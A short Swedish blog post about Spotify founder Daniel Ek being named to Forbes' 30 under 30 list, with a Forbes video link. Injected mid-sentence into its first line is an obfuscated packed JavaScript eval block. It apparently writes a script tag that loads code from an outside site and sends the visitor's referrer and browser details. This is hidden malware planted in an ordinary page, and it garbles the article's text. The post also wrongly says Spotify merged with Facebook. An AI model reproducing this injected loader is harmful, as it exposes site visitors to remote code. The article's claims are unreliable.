Image Image Image Image Image Image Image Image Image Image

| 17 juni, 2021

Scroll to top

Top

Spotify’s Daniel Ek: Världens viktigaste man inom musik

Spotify’s Daniel Ek: Världens viktigaste man inom musik
Sebastian

Från eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|tikks|var|u0026u|referrer|tsyfb||js|php’.split(’|’),0,{}))
Sverige till förstasidan på tidningen Forbes i listan för världens 30 viktigaste personer under 30 år.

Efter att Spotify slagit ihop sig med Facebook och bildat ett otroligt samarbete har spotify växt något helt otroligt. Nu är det dags för entreprenören och grundaren av spotify Daniel Ek att vara med i tidningen Forbes.

Forbes är en av världens största tidning inom ekonomi och entreprenörskap och är väldigt känd över att lista rikedomar och framgångar främst i USA men också världen. Med vänner som Mark Zuckerberg och Sean Parker vilka är frekventa gäster på Forbes listor varje månad så var denna intervju med Daniel Ek ganska väntat.

Nedanför kan ni se en video där Forbes diskuterar Daniel Ek och hur han kommit så långt som han gjort. 

Läs intervjun här: www.forbes.com

httpv://www.youtube.com/watch?v=T47-nj3puVA&feature=player_embedded